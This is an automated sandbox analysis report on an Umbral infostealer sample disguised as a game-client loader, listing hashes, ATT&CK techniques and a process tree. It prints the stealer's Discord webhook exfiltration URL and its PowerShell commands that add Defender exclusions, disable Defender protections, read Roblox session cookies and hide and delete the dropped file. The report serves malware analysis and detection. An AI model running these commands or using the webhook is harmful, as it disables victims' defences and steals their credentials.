umbral | be1584009cafff5d8f18674e6d2ea65085af54d372536c3dff3808c3bcdec576

Analysis

max time kernel
118s
max time network
120s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
22-01-2025 13:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OblivionClient - Loader.exe
Size

40.8MB
MD5

2b44034e50129f5147fdf24ecff3c206
SHA1

05ecb9594f74a0f567072fba224f07ebcfb524fa
SHA256

be1584009cafff5d8f18674e6d2ea65085af54d372536c3dff3808c3bcdec576
SHA512

212276778f9ad9f2ac08c5ff329880a068d1f0f1fc24474bab37e81e676fd4cf9bb0ae2ff68552997afb2e9ebd19c0e192526fa2c156ffb1e0d30dc168339cf5
SSDEEP

786432:LyQZMFClCtlII/CnlxrH4T4Vu862kpkKOWck7UazNyF3S6ghQbhEhNLBsEzP:LyQZkVlII/CnlxrH4J862kpkq/pzoahj

Score

10^/10

umbral defense_evasion discovery execution spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1329440770691956766/qs37sN2tGU-PNRiavv55Hvi1x0ymk-iw6Q12F2EL_j7u4_L0nijRqx5rIFVK9KPg7DEj

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x000600000001938a-7.dat	family_umbral
behavioral1/memory/2516-19-0x0000000000F20000-0x0000000000F60000-memory.dmp	family_umbral

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2492	powershell.exe
2692	powershell.exe
2448	powershell.exe
2352	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	wininit.exe

Executes dropped EXE 3 IoCs

pid	Process
320	csrss.exe
2516	wininit.exe
2560	OblivionLoader.exe

Loads dropped DLL 4 IoCs

pid	Process
1704	OblivionClient - Loader.exe
1704	OblivionClient - Loader.exe
1704	OblivionClient - Loader.exe
2248	Process not Found

Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
9	discord.com
10	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	OblivionClient - Loader.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1356	cmd.exe
2500	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2632	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2500	PING.EXE

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2432	powershell.exe
2516	wininit.exe
2492	powershell.exe
2352	powershell.exe
2692	powershell.exe
1500	powershell.exe
2448	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2432	powershell.exe
Token: SeDebugPrivilege	2516	wininit.exe
Token: SeIncreaseQuotaPrivilege	2752	wmic.exe
Token: SeSecurityPrivilege	2752	wmic.exe
Token: SeTakeOwnershipPrivilege	2752	wmic.exe
Token: SeLoadDriverPrivilege	2752	wmic.exe
Token: SeSystemProfilePrivilege	2752	wmic.exe
Token: SeSystemtimePrivilege	2752	wmic.exe
Token: SeProfSingleProcessPrivilege	2752	wmic.exe
Token: SeIncBasePriorityPrivilege	2752	wmic.exe
Token: SeCreatePagefilePrivilege	2752	wmic.exe
Token: SeBackupPrivilege	2752	wmic.exe
Token: SeRestorePrivilege	2752	wmic.exe
Token: SeShutdownPrivilege	2752	wmic.exe
Token: SeDebugPrivilege	2752	wmic.exe
Token: SeSystemEnvironmentPrivilege	2752	wmic.exe
Token: SeRemoteShutdownPrivilege	2752	wmic.exe
Token: SeUndockPrivilege	2752	wmic.exe
Token: SeManageVolumePrivilege	2752	wmic.exe
Token: 33	2752	wmic.exe
Token: 34	2752	wmic.exe
Token: 35	2752	wmic.exe
Token: SeIncreaseQuotaPrivilege	2752	wmic.exe
Token: SeSecurityPrivilege	2752	wmic.exe
Token: SeTakeOwnershipPrivilege	2752	wmic.exe
Token: SeLoadDriverPrivilege	2752	wmic.exe
Token: SeSystemProfilePrivilege	2752	wmic.exe
Token: SeSystemtimePrivilege	2752	wmic.exe
Token: SeProfSingleProcessPrivilege	2752	wmic.exe
Token: SeIncBasePriorityPrivilege	2752	wmic.exe
Token: SeCreatePagefilePrivilege	2752	wmic.exe
Token: SeBackupPrivilege	2752	wmic.exe
Token: SeRestorePrivilege	2752	wmic.exe
Token: SeShutdownPrivilege	2752	wmic.exe
Token: SeDebugPrivilege	2752	wmic.exe
Token: SeSystemEnvironmentPrivilege	2752	wmic.exe
Token: SeRemoteShutdownPrivilege	2752	wmic.exe
Token: SeUndockPrivilege	2752	wmic.exe
Token: SeManageVolumePrivilege	2752	wmic.exe
Token: 33	2752	wmic.exe
Token: 34	2752	wmic.exe
Token: 35	2752	wmic.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2352	powershell.exe
Token: SeDebugPrivilege	2692	powershell.exe
Token: SeDebugPrivilege	1500	powershell.exe
Token: SeIncreaseQuotaPrivilege	2044	wmic.exe
Token: SeSecurityPrivilege	2044	wmic.exe
Token: SeTakeOwnershipPrivilege	2044	wmic.exe
Token: SeLoadDriverPrivilege	2044	wmic.exe
Token: SeSystemProfilePrivilege	2044	wmic.exe
Token: SeSystemtimePrivilege	2044	wmic.exe
Token: SeProfSingleProcessPrivilege	2044	wmic.exe
Token: SeIncBasePriorityPrivilege	2044	wmic.exe
Token: SeCreatePagefilePrivilege	2044	wmic.exe
Token: SeBackupPrivilege	2044	wmic.exe
Token: SeRestorePrivilege	2044	wmic.exe
Token: SeShutdownPrivilege	2044	wmic.exe
Token: SeDebugPrivilege	2044	wmic.exe
Token: SeSystemEnvironmentPrivilege	2044	wmic.exe
Token: SeRemoteShutdownPrivilege	2044	wmic.exe
Token: SeUndockPrivilege	2044	wmic.exe
Token: SeManageVolumePrivilege	2044	wmic.exe
Token: 33	2044	wmic.exe

Suspicious use of WriteProcessMemory 55 IoCs

description	pid	Process	procid_target
PID 1704 wrote to memory of 2432	1704	OblivionClient - Loader.exe	30
PID 1704 wrote to memory of 2432	1704	OblivionClient - Loader.exe	30
PID 1704 wrote to memory of 2432	1704	OblivionClient - Loader.exe	30
PID 1704 wrote to memory of 2432	1704	OblivionClient - Loader.exe	30
PID 1704 wrote to memory of 320	1704	OblivionClient - Loader.exe	32
PID 1704 wrote to memory of 320	1704	OblivionClient - Loader.exe	32
PID 1704 wrote to memory of 320	1704	OblivionClient - Loader.exe	32
PID 1704 wrote to memory of 320	1704	OblivionClient - Loader.exe	32
PID 1704 wrote to memory of 2516	1704	OblivionClient - Loader.exe	33
PID 1704 wrote to memory of 2516	1704	OblivionClient - Loader.exe	33
PID 1704 wrote to memory of 2516	1704	OblivionClient - Loader.exe	33
PID 1704 wrote to memory of 2516	1704	OblivionClient - Loader.exe	33
PID 1704 wrote to memory of 2560	1704	OblivionClient - Loader.exe	35
PID 1704 wrote to memory of 2560	1704	OblivionClient - Loader.exe	35
PID 1704 wrote to memory of 2560	1704	OblivionClient - Loader.exe	35
PID 1704 wrote to memory of 2560	1704	OblivionClient - Loader.exe	35
PID 2516 wrote to memory of 2752	2516	wininit.exe	36
PID 2516 wrote to memory of 2752	2516	wininit.exe	36
PID 2516 wrote to memory of 2752	2516	wininit.exe	36
PID 2516 wrote to memory of 2136	2516	wininit.exe	39
PID 2516 wrote to memory of 2136	2516	wininit.exe	39
PID 2516 wrote to memory of 2136	2516	wininit.exe	39
PID 2516 wrote to memory of 2492	2516	wininit.exe	41
PID 2516 wrote to memory of 2492	2516	wininit.exe	41
PID 2516 wrote to memory of 2492	2516	wininit.exe	41
PID 2516 wrote to memory of 2352	2516	wininit.exe	43
PID 2516 wrote to memory of 2352	2516	wininit.exe	43
PID 2516 wrote to memory of 2352	2516	wininit.exe	43
PID 2516 wrote to memory of 2692	2516	wininit.exe	45
PID 2516 wrote to memory of 2692	2516	wininit.exe	45
PID 2516 wrote to memory of 2692	2516	wininit.exe	45
PID 2516 wrote to memory of 1500	2516	wininit.exe	47
PID 2516 wrote to memory of 1500	2516	wininit.exe	47
PID 2516 wrote to memory of 1500	2516	wininit.exe	47
PID 2516 wrote to memory of 2044	2516	wininit.exe	50
PID 2516 wrote to memory of 2044	2516	wininit.exe	50
PID 2516 wrote to memory of 2044	2516	wininit.exe	50
PID 2516 wrote to memory of 2388	2516	wininit.exe	52
PID 2516 wrote to memory of 2388	2516	wininit.exe	52
PID 2516 wrote to memory of 2388	2516	wininit.exe	52
PID 2516 wrote to memory of 1800	2516	wininit.exe	54
PID 2516 wrote to memory of 1800	2516	wininit.exe	54
PID 2516 wrote to memory of 1800	2516	wininit.exe	54
PID 2516 wrote to memory of 2448	2516	wininit.exe	56
PID 2516 wrote to memory of 2448	2516	wininit.exe	56
PID 2516 wrote to memory of 2448	2516	wininit.exe	56
PID 2516 wrote to memory of 2632	2516	wininit.exe	58
PID 2516 wrote to memory of 2632	2516	wininit.exe	58
PID 2516 wrote to memory of 2632	2516	wininit.exe	58
PID 2516 wrote to memory of 1356	2516	wininit.exe	60
PID 2516 wrote to memory of 1356	2516	wininit.exe	60
PID 2516 wrote to memory of 1356	2516	wininit.exe	60
PID 1356 wrote to memory of 2500	1356	cmd.exe	62
PID 1356 wrote to memory of 2500	1356	cmd.exe	62
PID 1356 wrote to memory of 2500	1356	cmd.exe	62

Views/modifies file attributes 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
2136	attrib.exe

C:\Users\Admin\AppData\Local\Temp\OblivionClient - Loader.exe
"C:\Users\Admin\AppData\Local\Temp\OblivionClient - Loader.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1704
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAcABzACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAbgBuACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHgAaABxACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGkAeABuACMAPgA="
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2432
- C:\Users\Admin\AppData\Local\Temp\csrss.exe
  "C:\Users\Admin\AppData\Local\Temp\csrss.exe"
  2⤵
  - Executes dropped EXE
  PID:320
- C:\Users\Admin\AppData\Local\Temp\wininit.exe
  "C:\Users\Admin\AppData\Local\Temp\wininit.exe"
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2516
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2752
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\wininit.exe"
    3⤵
    - Views/modifies file attributes
    PID:2136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\wininit.exe'
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2492
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2352
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2692
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1500
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2044
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:2388
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:1800
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    PID:2448
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2632
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\wininit.exe" && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Suspicious use of WriteProcessMemory
    PID:1356
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2500
- C:\Users\Admin\AppData\Local\Temp\OblivionLoader.exe
  "C:\Users\Admin\AppData\Local\Temp\OblivionLoader.exe"
  2⤵
  - Executes dropped EXE
  PID:2560

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\OblivionLoader.exe

Filesize
3.3MB

MD5
fd80fb2330bab1bf16540543585b392e

SHA1
7214d0bf0561b3d571c26f495a3e2eccf5038557

SHA256
07a727c8555a5f5ed8bbd72a8c3afde5e1570fe9d4b383009a71fafec692f567

SHA512
b13d6c668871849264a2419d1cc6c95d98e4aad93a38c72dc48b92f72f099577e3fdc69b648aa00b355c140e7d3cb53947c36c849453885aacd4a0731ce265f7

Download Submit
C:\Users\Admin\AppData\Local\Temp\csrss.exe

Filesize
37.2MB

MD5
26a7e5a17d53f8709cfc9ebd583459a7

SHA1
b3090549b8ccf277612b568a4e5f6177ab5334c6

SHA256
b75157e6d824a7df8a05622d200c801f35ff53b6022fab575355d099220aa4d2

SHA512
0bf643adcfd5318d88a20785a31aca0219c21ae81c388405ee9f4adfe59cfcf88a436264c8d1724988c614fa945bd2d2a99ec151d1b9601b1c8a0bab9a333106

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BFJZI3V649N4JRJNJCB2.temp

Filesize
7KB

MD5
d621043333a830d9d145ba78920d8b60

SHA1
c9af5205c3172cf37ab85ca5a6bb0a50aef969ed

SHA256
79c6f0df0cb0797173c584eaf363fcc3b1b4cfcce853b6a3c86a96674bac9674

SHA512
84eb95d8618009c6317c7575a59749fae59820821363ef1ce25d2af36fc76efc2e3ea8323cb299efd6d10a2f37984d57fcd6f5b6b14f118026060e5991653479

Download Submit
\Users\Admin\AppData\Local\Temp\wininit.exe

Filesize
230KB

MD5
5e48a4e58fa2e9584c5a3b37dff630a3

SHA1
6f28ff8b9ca467eb80306abc46f63677bfcc0e56

SHA256
5088ab958c58c4cea16918464ae7a90d0a75a3f1d92acd5d52bdad80a95e61a8

SHA512
88c3ada9f8b6ae43c0e1736924f86081cb3358a8ec5db712acd7133588f158495533e8fa0fb83143c092942eabd0ffc79017ee7621400f9c263e925b42181bea

Download Submit
memory/2352-32-0x000000001B710000-0x000000001B9F2000-memory.dmp

Filesize
2.9MB

Download
memory/2352-33-0x0000000001E10000-0x0000000001E18000-memory.dmp

Filesize
32KB

Download
memory/2448-63-0x00000000027E0000-0x00000000027E8000-memory.dmp

Filesize
32KB

Download
memory/2492-24-0x000000001B690000-0x000000001B972000-memory.dmp

Filesize
2.9MB

Download
memory/2492-25-0x0000000001F00000-0x0000000001F08000-memory.dmp

Filesize
32KB

Download
memory/2516-19-0x0000000000F20000-0x0000000000F60000-memory.dmp

Filesize
256KB

Download